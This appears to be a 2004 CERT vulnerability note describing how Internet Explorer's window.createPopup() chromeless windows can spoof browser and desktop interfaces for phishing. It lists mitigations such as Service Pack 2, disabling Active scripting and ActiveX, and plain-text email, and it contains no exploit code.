The Internet Explorer (IE) window.createPopup() method creates chromeless popup windows. These windows can be used to spoof the user interface in Internet Explorer, any Windows application, or the Windows desktop.
The visible area of a web browser window can be categorized into two areas: content and chrome. The content area is where the web browser renders HTML and other data. The chrome area surrounds the content area and includes the status bar, address bar, tool bar, and menu area. In most cases, the entire browser window (chrome and content) is enclosed with "window management decorations" - title, frame, and minimize, maximize, resize, and close controls.
The IE Dynamic HTML (DHTML) model supports a proprietary method to create chromeless popup windows. This method, window.createPopup(), creates browser windows with the following characteristics:
By convincing the user to view an HTML document (e.g., web page, email message) an attacker can deceive the user by changing the appearance of the GUI. Because of their unique characteristics, chromeless windows can be used to facilitate phishing attacks. For example, an attacker can create a fake address bar and HTTPS padlock icon to spoof a secure website.
Install Windows XP Service Pack 2 (SP2)
Disable Active scripting and ActiveX controls
Disabling Active scripting prevents attackers from creating chromeless windows using window.Createpopup(). Disabling ActiveX controls prevents IE from making images transparent, which is a component of publicly available exploit code.
At a minimum, disable Active scripting and ActiveX controls in the Internet zone and the zone used by Outlook, Outlook Express, or any other software that uses the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML). Instructions for disabling Active scripting and ActiveX controls can be found in the Malicious Web Scripts FAQ.
Apply the Outlook Email Security Update
Another way to effectively disable Active scripting and ActiveX controls in Outlook is to install the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where Active scripting and ActiveX controls are disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook. The Outlook Email Security Update is available for Outlook 98 and Outlook 2000. The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6.
Render email in plain text
Configure email client software (mail user agent [MUA]) to render email messages in plaint text. Instructions to configure Outlook 2002 and Outlook Express 6 are available in Microsoft Knowledge Base Articles 307594 and 291387, respectively. HTML-formatted email messages may not appear properly, however script will not be evaluated, thus preventing certain types of attacks.
Maintain updated antivirus software
Antivirus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely on antivirus software to defend against this vulnerability.
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, the graphical user interface (GUI), and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser, especially when browsing untrusted sites. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML).
Thanks to Georgi Guninski and Andrew Clover for reporting this vulnerability.
This document was written by Will Dormann and Art Manion.
|Date First Published:||2004-09-10|
|Date Last Updated:||2004-10-27 21:31 UTC|